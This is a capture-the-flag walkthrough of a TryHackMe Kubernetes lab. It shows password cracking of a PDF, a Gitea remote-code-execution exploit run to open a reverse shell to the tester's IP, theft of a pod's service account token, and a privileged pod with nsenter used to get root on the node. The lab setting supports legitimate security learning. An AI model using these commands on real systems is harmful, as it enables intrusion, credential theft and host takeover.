[THM] palsforlife

url: https://tryhackme.com/room/palsforlife

difficulty: Medium

“Abuse a misconfigured Kubernetes cluster”

First move, port scan with nmap:

Ports:
22 open/tcp//ssh///            -> ssh service
6443 open/tcp//sun-sr-https/// -> api k8s(k3s)
10250 open/tcp/////            -> api kubelet
30180 open/tcp/////            -> nginx web
31111 open/tcp/////            -> gitea web
31112 open/tcp/////            -> gitea ssh (?)

Looking git service (gitea, port 31111), we can see this user:

user: leeroy
mail: leeroy@jenki.ns

users

Now we focus on the webserver (nginx, port 30180). I used gobuster to try to find something. After a minutes, i found /team/ path.

team

In the source code, we can see a strange file (base64 encode).

I copied the code in index.b64 to decode:

cat index.b64 | base64 -d > index.pdf

I tried to open the pdf file but needs a password. For this job I used john.

┌──(root💀6395bd32f1c4)-[/mnt]
└─# /usr/share/john/pdf2john.pl index.pdf > hashpdf
┌──(root💀6395bd32f1c4)-[/mnt]
└─# john --wordlist=rockyou.txt hashpdf
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 6 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
XXXXXXXXXXXX      (index.pdf)
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed

We found the password, open the file and we can see a string.

index.pdf

I used this string to password login with the user in the git service. Looking at some repos and configs it’s possible to get the first flag.

flag1

The next step, get more info about gitea service. I found this exploit https://www.exploit-db.com/exploits/49571

┌──(root💀6395bd32f1c4)-[/mnt]
└─# python3 49571.py -t http://10.10.76.180:31111 -u leeroy -p "XXXXXXXXX"  -I 10.9.0.XX -P 4445
 _____ _ _______
/ ____(_)__   __|             CVE-2020-14144
| |  __ _   | | ___  __ _
| | |_ | |  | |/ _ \/ _` |     Authenticated Remote Code Execution
| |__| | |  | |  __/ (_| |
 \_____|_|  |_|\___|\__,_|     GiTea versions >= 1.1.0 to <= 1.12.5
[+] Starting exploit ...
hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all
hint: of your new repositories, which will suppress this warning, call:
hint:
hint:   git config --global init.defaultBranch <name>
hint:
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
hint: 'development'. The just-created branch can be renamed via this command:
hint:
hint:   git branch -m <name>
Initialized empty Git repository in /tmp/tmp.SNSwbhH9Ge/.git/
[master (root-commit) 1cd23c8] Initial commit
1 file changed, 1 insertion(+)
create mode 100644 README.md
Enumerating objects: 3, done.
Counting objects: 100% (3/3), done.
Writing objects: 100% (3/3), 246 bytes | 246.00 KiB/s, done.
[+] Exploit completed !

Now we have a shell and the second flag.

bash-4.4$ whoami
whoami
git
bash-4.4$ pwd
pwd
/data/git
bash-4.4$ ls /root/
ls /root/
flag2.txt
bash-4.4$ cat /root/flag2.txt
cat /root/flag2.txt
flag{XXXXXXXXXXXXXX}

The CTF it’s about Kubernetes, so I tried to found any credentials inside a pod. Looking at the dir /var/run/secrets/kubernetes.io/serviceaccount we found ca.crt and token for the service account.

Using kubectl it’s possible to talk with the k8s API (thanks gitea serviceaccount).

kubectl config set-cluster pals --server=<server> --certificate-authority=ca.crt
kubectl config set-context pals --cluster=pals
kubectl config set-credentials user --token=<token>
kubectl config set-context pals --user=user
kubectl config use-context pals

We found flag3 inside a secret in kube-system namespace.

flag3

Finally, I tried to get root in the host node (the cluster only has 1 node). I used a script to run a pod with privileges in the node. The nodes don’t have internet access, so I used the same hash image that the nginx webserver.

https://gist.github.com/jjo/a8243c677f7e79f2f1d610f02365fdd7

┌──(root💀6395bd32f1c4)-[/mnt/kubernetes]
└─# bash kubectl-root-in-host.sh palsforlife
+ kubectl run sudo-palsforlife --restart=Never -it --image overriden --overrides '
{
  "spec": {
    "hostPID": true,
    "hostNetwork": true,
    "nodeSelector": { "kubernetes.io/hostname": "palsforlife" },
    "tolerations": [
      { "effect": "NoSchedule", "key": "node-role.kubernetes.io/master" },
      { "effect": "NoSchedule", "key": "node-role.kubernetes.io/controlplane" },
      { "effect": "NoExecute", "key": "node-role.kubernetes.io/etcd" }
    ],
    "containers": [
      {
        "name": "nginx",
        "image": "nginx@sha256:6d75c99af15565a301e48297fa2d121e15d80ad526f8369c526324f0f7ccb750",
        "imagePullPolicy": "Never",
        "command": [
          "nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-"
        ],
        "stdin": true,
        "tty": true,
        "resources": {"requests": {"cpu": "10m"}},
        "securityContext": {
          "privileged": true
        }
      }
    ]
  }
}' --rm --attach
If you don't see a command prompt, try pressing enter.
# whoami
root
# hostname
palsforlife
# cat /root/root.txt
flag{XXXXXXXXXXXX}

TryHackMe | mclavel